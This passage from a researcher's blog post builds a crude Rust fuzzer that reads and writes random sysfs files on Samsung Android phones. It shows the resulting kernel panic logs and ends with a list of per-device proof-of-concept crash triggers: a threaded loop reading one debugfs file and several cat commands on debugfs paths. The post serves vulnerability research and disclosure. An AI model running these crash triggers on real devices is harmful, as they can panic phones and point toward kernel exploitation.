<span class="n">threads</span><span class="nf">.push</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="nf">worker</span><span class="p">(</span><span class="n">dirlisting</span><span class="p">)));</span>
<span class="p">}</span>
<span class="c">// Wait for all threads to complete</span>
<span class="k">for</span> <span class="n">thread</span> <span class="n">in</span> <span class="n">threads</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">thread</span><span class="nf">.join</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">extern</span> <span class="p">{</span>
<span class="k">fn</span> <span class="nf">daemon</span><span class="p">(</span><span class="n">nochdir</span><span class="p">:</span> <span class="nb">i32</span><span class="p">,</span> <span class="n">noclose</span><span class="p">:</span> <span class="nb">i32</span><span class="p">)</span> <span class="k">-></span> <span class="nb">i32</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">daemonize</span><span class="p">()</span> <span class="p">{</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"Daemonizing</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="nf">daemon</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="c">// Sleep to allow a physical cable swap</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">sleep</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="nn">Duration</span><span class="p">::</span><span class="nf">from_secs</span><span class="p">(</span><span class="mi">10</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Pretty simple, nothing crazy here. We get a full phone directory listing, spin up <code class="language-plaintext highlighter-rouge">MAX_THREADS</code> threads, and those threads loop forever picking random files to read and write to.</p>
<p>Let me just give this a little push to the phone annnnnnnnnnnnnnd… <strong>and the phone panicked</strong>. In fact almost all the phones I have at my desk panicked!</p>
<p><em>There we go. We have created a world class Android kernel fuzzer, printing out new 0-day!</em></p>
<p>In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5), let’s check out how we crashed by reading <code class="language-plaintext highlighter-rouge">/proc/last_kmsg</code> from the phone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G W 4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4
</code></pre></div></div>
<p>Ah cool, derefing <code class="language-plaintext highlighter-rouge">00662625</code>, my favorite kernel address! Looks like it’s some form of heap corruption. We probably could exploit this especially as if we mapped in <code class="language-plaintext highlighter-rouge">0x00662625</code> we would get to control a kernel land object from userland. It would require the right groom. This specific bug has been minimized and you can find a targeted PoC in the <code class="language-plaintext highlighter-rouge">Wall of Shame</code> section</p>
<h1 id="using-the-fuzzer">Using the “fuzzer”</h1>
<p>You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along. Especially on phones which seem to fight back a bit.</p>
<p>Protips:</p>
<ul>
<li>Restart fuzzer regularly, it gets stuck a lot</li>
<li>Do random things on the phone like browsing or using the camera to generate kernel activity</li>
<li>Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies</li>
<li>Tweak the <code class="language-plaintext highlighter-rouge">MAX_THREADS</code> value from low values to high values</li>
<li>Create blacklists for files which are known to block forever on reads</li>
</ul>
<p>Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as selinux policies get stricter.</p>
<h1 id="next-device">Next device</h1>
<p>Okay so we’ve looked at the latest Galaxy S8, let’s try to look at an older Galaxy S5 (G900FXXU1CRH1). <em>Whelp, that one crashed even faster.</em> However if we try to get <code class="language-plaintext highlighter-rouge">/proc/last_kmsg</code> we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and <code class="language-plaintext highlighter-rouge">daemonize()</code> the application so we can observe the crash over that. However that didn’t work in this case either (honestly not sure why, I get dmesg output but no panic log).</p>
<p>So now we have this problem. How do we root cause this bug? Well, we can do a binary search of the filesystem and blacklist files in certain folders and try to whittle it down. Lets give that a shot!</p>
<p>First let’s only allow use of <code class="language-plaintext highlighter-rouge">/sys/*</code> and beyond, all other files will be disallowed, typically these bugs from the fuzzer come from <code class="language-plaintext highlighter-rouge">sysfs</code> and <code class="language-plaintext highlighter-rouge">procfs</code>. We’ll do this by changing the directory listing call to <code class="language-plaintext highlighter-rouge">listdirs(Path::new("/sys"), &mut dirlisting);</code></p>
<p><em>Woo, it worked!</em> Crashed faster, and this time we limited to <code class="language-plaintext highlighter-rouge">/sys</code>. So we know the bug exists somewhere in <code class="language-plaintext highlighter-rouge">/sys</code>.</p>
<p>Now we’ll go deeper in <code class="language-plaintext highlighter-rouge">/sys</code>, maybe we try <code class="language-plaintext highlighter-rouge">/sys/devices</code>… oops, no luck. We’ll have to try another. Maybe <code class="language-plaintext highlighter-rouge">/sys/kernel</code>?… <em>WINNER WINNER!</em></p>
<p>So we’ve whittled it down further to <code class="language-plaintext highlighter-rouge">/sys/kernel/debug</code> but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?</p>
<h1 id="improving-the-fuzzer">Improving the fuzzer</h1>
<p>So currently we have no idea which files were touched to cause the crash. We can print them and then view them over ADB, however this doesn’t sync when the phone panics… we need even better.</p>
<p>Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!</p>
<p>We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via <code class="language-plaintext highlighter-rouge">adb reverse tcp:13370 tcp:13370</code>, which will forward connections to <code class="language-plaintext highlighter-rouge">127.0.0.1:13370</code> on the phone to our host where our program is running and will log filenames.</p>
<h4 id="designing-a-terrible-protocol">Designing a terrible protocol</h4>
<p>We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">net</span><span class="p">::</span><span class="n">TcpListener</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::{</span><span class="n">Read</span><span class="p">,</span> <span class="n">Write</span><span class="p">};</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-></span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::</span><span class="n">Result</span><span class="o"><</span><span class="p">()</span><span class="o">></span> <span class="p">{</span>
<span class="k">let</span> <span class="n">listener</span> <span class="o">=</span> <span class="nn">TcpListener</span><span class="p">::</span><span class="nf">bind</span><span class="p">(</span><span class="s">"0.0.0.0:13370"</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buffer</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span><span class="mi">0u8</span><span class="p">;</span> <span class="mi">64</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">];</span>
<span class="k">for</span> <span class="n">stream</span> <span class="n">in</span> <span class="n">listener</span><span class="nf">.incoming</span><span class="p">()</span> <span class="p">{</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"Got new connection</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">stream</span> <span class="o">=</span> <span class="n">stream</span><span class="o">?</span><span class="p">;</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">bread</span><span class="p">)</span> <span class="o">=</span> <span class="n">stream</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buffer</span><span class="p">)</span> <span class="p">{</span>
<span class="c">// Connection closed, break out</span>
<span class="k">if</span> <span class="n">bread</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c">// Send acknowledge</span>
<span class="n">stream</span><span class="nf">.write</span><span class="p">(</span><span class="n">b</span><span class="s">"ACK"</span><span class="p">)</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to send ack"</span><span class="p">);</span>
<span class="n">stream</span><span class="nf">.flush</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to flush"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">string</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">str</span><span class="p">::</span><span class="nf">from_utf8</span><span class="p">(</span><span class="o">&</span><span class="n">buffer</span><span class="p">[</span><span class="o">..</span><span class="n">bread</span><span class="p">])</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"Invalid UTF-8 character in string"</span><span class="p">);</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"Fuzzing: {}</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">string</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="c">// Failed to read, break out</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.</p>
<h4 id="client-side">Client side</h4>
<p>From the phone we just implement a simple function:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// Connect to the server we report to and pass this along to functions</span>
<span class="c">// threads that need socket access</span>
<span class="k">let</span> <span class="n">stream</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">Mutex</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">TcpStream</span><span class="p">::</span><span class="nf">connect</span><span class="p">(</span><span class="s">"127.0.0.1:13370"</span><span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to open TCP connection"</span><span class="p">)));</span>
<span class="k">fn</span> <span class="nf">inform_filename</span><span class="p">(</span><span class="n">handle</span><span class="p">:</span> <span class="o">&</span><span class="n">Mutex</span><span class="o"><</span><span class="n">TcpStream</span><span class="o">></span><span class="p">,</span> <span class="n">filename</span><span class="p">:</span> <span class="o">&</span><span class="nb">str</span><span class="p">)</span> <span class="p">{</span>
<span class="c">// Report the filename</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">socket</span> <span class="o">=</span> <span class="n">handle</span><span class="nf">.lock</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to lock mutex"</span><span class="p">);</span>
<span class="n">socket</span><span class="nf">.write_all</span><span class="p">(</span><span class="n">filename</span><span class="nf">.as_bytes</span><span class="p">())</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to write"</span><span class="p">);</span>
<span class="n">socket</span><span class="nf">.flush</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to flush"</span><span class="p">);</span>
<span class="c">// Wait for an ACK</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">ack</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0u8</span><span class="p">;</span> <span class="mi">3</span><span class="p">];</span>
<span class="n">socket</span><span class="nf">.read_exact</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">ack</span><span class="p">)</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to read ack"</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="o">&</span><span class="n">ack</span> <span class="o">==</span> <span class="n">b</span><span class="s">"ACK"</span><span class="p">,</span> <span class="s">"Did not get ACK as expected"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<h4 id="developing-blacklist">Developing blacklist</h4>
<p>Okay so now we have a log of all files we’re fuzzing, and they’re confirmed by the server so we don’t lose anything. Lets set it into single threaded mode so we don’t have to worry about race conditions for now.</p>
<p>We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on <code class="language-plaintext highlighter-rouge">starts_with</code> matching.</p>
<h4 id="back-to-fuzzing">Back to fuzzing</h4>
<p>So when fuzzing the last file we saw touched was <code class="language-plaintext highlighter-rouge">/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout</code> before a crash.</p>
<p>Let’s hammer this in a loop… and it worked! So now we can develop a fully self contained PoC:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="n">File</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::</span><span class="n">Read</span><span class="p">;</span>
<span class="k">fn</span> <span class="nf">thrasher</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Buffer to read into</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="k">let</span> <span class="k">fn</span> <span class="o">=</span> <span class="s">"/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout"</span><span class="p">;</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="nn">File</span><span class="p">::</span><span class="nf">open</span><span class="p">(</span><span class="k">fn</span><span class="p">)</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Make fuzzing threads</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">threads</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="mi">4</span> <span class="p">{</span>
<span class="n">threads</span><span class="nf">.push</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="nf">thrasher</span><span class="p">()));</span>
<span class="p">}</span>
<span class="c">// Wait for all threads to exit</span>
<span class="k">for</span> <span class="n">thr</span> <span class="n">in</span> <span class="n">threads</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">thr</span><span class="nf">.join</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>What a top tier PoC!</p>
<h4 id="next-bug">Next bug?</h4>
<p>So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.</p>
<p>Nope, nothing else, the S5 is officially secure and fixed of all bugs.</p>
<h1 id="the-end-of-an-era">The end of an era</h1>
<p>Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if selinux is set to permissive. But sadly as time has gone on these bugs have become hidden behind selinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.</p>
<p>There is a lot to improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make this better</p>
<ul>
<li>Make it perform random <code class="language-plaintext highlighter-rouge">ioctl()</code> calls</li>
<li>Make it attempt to <code class="language-plaintext highlighter-rouge">mmap()</code> and use the mappings for these devices</li>
<li>Actually understand what the file expects</li>
<li>Use multiple processes or something to let the fuzzer continue to run when it gets stuck</li>
<li>Run it for more than 1 minute before giving up on a phone</li>
<li>Make better blacklists/whitelists</li>
</ul>
<p>In the future maybe I’ll exploit one of these bugs in another blog, or root cause them in source.</p>
<h1 id="wall-of-shame">Wall of Shame</h1>
<p><em>Try it out on your own test phones (not on your actual phone, that’d probably be a bad idea). Let me know if you have any silly bugs found by this to add to the wall of shame.</em></p>
<h4 id="g900f-exynos-galaxy-s5-g900fxxu1crh1-august-1-2017">G900F (Exynos Galaxy S5) [G900FXXU1CRH1] (August 1, 2017)</h4>
<p><strong>PoC</strong></p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="n">File</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::</span><span class="n">Read</span><span class="p">;</span>
<span class="k">fn</span> <span class="nf">thrasher</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Buffer to read into</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="k">let</span> <span class="k">fn</span> <span class="o">=</span> <span class="s">"/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout"</span><span class="p">;</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="nn">File</span><span class="p">::</span><span class="nf">open</span><span class="p">(</span><span class="k">fn</span><span class="p">)</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Make fuzzing threads</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">threads</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="mi">4</span> <span class="p">{</span>
<span class="n">threads</span><span class="nf">.push</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="nf">thrasher</span><span class="p">()));</span>
<span class="p">}</span>
<span class="c">// Wait for all threads to exit</span>
<span class="k">for</span> <span class="n">thr</span> <span class="n">in</span> <span class="n">threads</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">thr</span><span class="nf">.join</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h4 id="j200h-galaxy-j2-j200hxxu0aqk2-august-1-2017">J200H (Galaxy J2) [J200HXXU0AQK2] (August 1, 2017)</h4>
<p><em>not root caused, just run the fuzzer</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[c0] Unable to handle kernel paging request at virtual address 62655726
[c0] pgd = c0004000
[c0] [62: ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>] lr : [<62655722>] psr: 000d0093
sp : ee457d20 ip : 00000000 fp : ee457d54
[c0] r10: ed859210 r9 : c0c833e4 r8 : ed859338
[c0] r7 : ee456000
[c0] PC is at devres_for_each_res+0x68/0xdc
[c0] LR is at 0x62655722
[c0] pc : [<c0302848>] lr : [<62655722>] psr: 000d0093
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d0013 00000000 ffffffff ffffffff
[c0] [<c0302848>] (devres_for_each_res+0x68/0xdc) from [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118)
[c0] [<c030d5f0>] (dev_cache_fw_image+0x4c/0x118) from [<c0306050>] (dpm_for_each_dev+0x4c/0x6c)
[c0] [<c0306050>] (dpm_for_each_dev+0x4c/0x6c) from [<c030d824>] (fw_pm_notify+0xe4/0x100)
[c0] [<c030d[<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
[c0] [<c003d6bc>] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c)
[c0] [<c0063824>] (pm_notifier_call_chain+0x28/0x3c) from [<c00644a0>] (pm_suspend+0x154/0x238)
[c0] [<c00644a0>] (pm_suspend+0x154/0x238) from [<c00657bc>] (suspend+0x78/0x1b8)
[c0] [<c00657bc>] (suspend+0x78/0x1b8) from [<c003d6bc>] (process_one_work+0x160/0x4b8)
</code></pre></div></div>
<h4 id="j500h-galaxy-j5-j500hxxu2bqi1-august-1-2017">J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)</h4>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/usb_serial0/readstatus</code></p>
<p>or</p>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/usb_serial1/readstatus</code></p>
<p>or</p>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/usb_serial2/readstatus</code></p>
<p>or</p>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/usb_serial3/readstatus</code></p>
<h4 id="j500h-galaxy-j5-j500hxxu2bqi1-august-1-2017-1">J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)</h4>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/mdp/xlog/dump</code></p>
<h4 id="j500h-galaxy-j5-j500hxxu2bqi1-august-1-2017-2">J500H (Galaxy J5) [J500HXXU2BQI1] (August 1, 2017)</h4>
<p><code class="language-plaintext highlighter-rouge">cat /sys/kernel/debug/rpm_master_stats</code></p>
<h4 id="j700h-galaxy-j7-j700hxxu3brc2-august-1-2017">J700H (Galaxy J7) [J700HXXU3BRC2] (August 1, 2017)</h4>
<p><em>not root caused, just run the fuzzer</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Unable to handle kernel paging request at virtual address ff00000107
pgd = ffffffc03409d000
[ff00000107] *pgd=0000000000000000
mms_ts 9-0048: mms_sys_fw_update [START]
mms_ts 9-0048: mms_fw_update_from_storage [START]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] file_open - path[/sdcard/melfas.mfsb]
mms_ts 9-0048: mms_fw_update_from_storage [ERROR] -3
mms_ts 9-0048: mms_sys_fw_update [DONE]
muic-universal:muic_show_uart_sel AP
usb: enable_show dev->enabled=1
sm5703-fuelga0000000000000000
Kernel BUG at ffffffc00034e124 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G W 3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70
</code></pre></div></div>
<h4 id="g920f-exynos-galaxy-s6-g920fxxu5dqbc-febuary-1-2017-now-gated-by-selinux-">G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (Febuary 1, 2017) Now gated by selinux :(</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G W 3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84
</code></pre></div></div>
<h4 id="g950f-exynos-galaxy-s8-g950fxxu4cri5-september-1-2018">G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)</h4>
<p>Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.</p>
<p>(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600
PC: 0xffffffc000c20230:
0230 128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250 01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270 deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
